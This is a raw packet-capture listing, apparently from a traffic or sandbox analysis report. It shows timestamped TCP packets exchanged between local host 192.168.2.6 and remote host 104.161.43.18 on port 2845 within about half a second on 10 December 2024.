                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.514285088 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.515038967 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.515185118 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.515232086 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.516207933 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.516235113 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.516308069 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.517187119 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.517345905 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.517395020 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.518261909 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.518279076 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.518318892 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.519205093 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.519366980 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.519434929 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.520291090 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.520450115 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.520493984 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.521229029 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.521416903 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.521541119 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.522407055 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.522571087 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.522783041 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.523201942 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.523361921 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.523680925 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.524354935 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.524502039 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.524545908 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.525330067 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.525489092 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.525752068 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.526431084 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.526597023 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.527427912 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.527477026 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.527591944 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.527643919 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.528383970 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.528538942 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.528862953 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.529455900 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.529752970 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.529802084 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.530436039 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.530595064 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.530637026 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.531565905 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.531764984 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.531824112 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.532588959 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.532742023 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.533247948 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.533535004 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.533850908 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.533902884 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.534646034 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.534663916 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.534728050 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.535306931 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.535459042 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.535634995 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.536426067 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.536443949 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.536500931 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.537482023 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.537656069 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.537702084 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.538424969 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.591535091 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.673742056 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.673789978 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.673911095 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.674201012 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.674282074 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.674376011 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.674978018 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.675158024 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.675267935 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.675966024 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.676059008 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.676126957 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.676990032 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.677071095 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.678030014 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.678091049 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.678126097 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.678172112 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.679085970 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.679187059 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.679260969 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.680090904 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.680162907 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.680310965 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.681098938 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.681205034 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.681297064 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.682101965 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.682225943 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.682275057 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.683197021 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.683330059 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.683373928 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.684279919 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.684381962 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.684515953 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.685216904 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.685307026 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.685353994 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.686247110 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.686376095 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.686420918 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.687422037 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.687712908 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.687784910 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.688369989 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.688530922 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.688730001 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.689335108 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.689414024 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.689524889 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.690340996 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.690453053 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.690689087 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.691378117 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.691570997 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.691617012 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.692529917 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.692636013 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.692687988 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.693435907 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.693541050 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.693584919 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.694459915 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.694582939 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.694633961 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.695497990 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.695593119 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.696542025 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.696593046 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.696633101 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.696727991 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.697530985 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.697599888 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.697990894 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.698581934 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.698667049 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.699004889 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.699609041 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.699760914 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.699839115 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.700627089 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.700819016 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.700864077 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.701639891 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.701844931 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.701941967 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.702713966 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.702856064 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.702912092 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.703763008 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.703974962 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.704034090 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.704802990 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.704880953 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.705705881 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.705749035 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.705878019 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.705981016 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.706813097 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.706877947 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.706924915 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.707825899 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.707928896 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.708066940 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.708904982 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.709043026 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.709225893 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.709892035 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.710020065 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.710057020 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.710905075 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.710985899 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.711308002 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.711935043 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.712034941 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.712143898 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.712969065 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.713057041 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.713345051 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.714006901 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.714102030 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.714194059 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.715023994 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.715150118 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.715188980 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.716072083 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.716151953 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.716187954 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.717093945 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.717202902 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.717242956 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.718132973 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.718234062 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.718281031 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.719146013 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.719259024 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.719342947 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.720278025 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.720344067 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.721184969 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.721236944 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.721296072 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.721335888 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.722220898 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.722336054 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.722410917 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.723262072 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.723407030 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.723454952 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.724328041 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.724426031 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.724473000 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.725256920 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.725375891 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.725856066 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.726006031 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.726146936 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.726703882 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.727101088 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.727128029 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.727307081 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.865865946 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.865958929 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.866022110 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.866332054 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.866432905 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.866516113 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.867377043 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.867482901 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.867525101 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.868376017 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.868444920 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.868670940 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.869426966 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.869554043 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.869712114 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:13.870465994 CET284549908104.161.43.18192.168.2.6
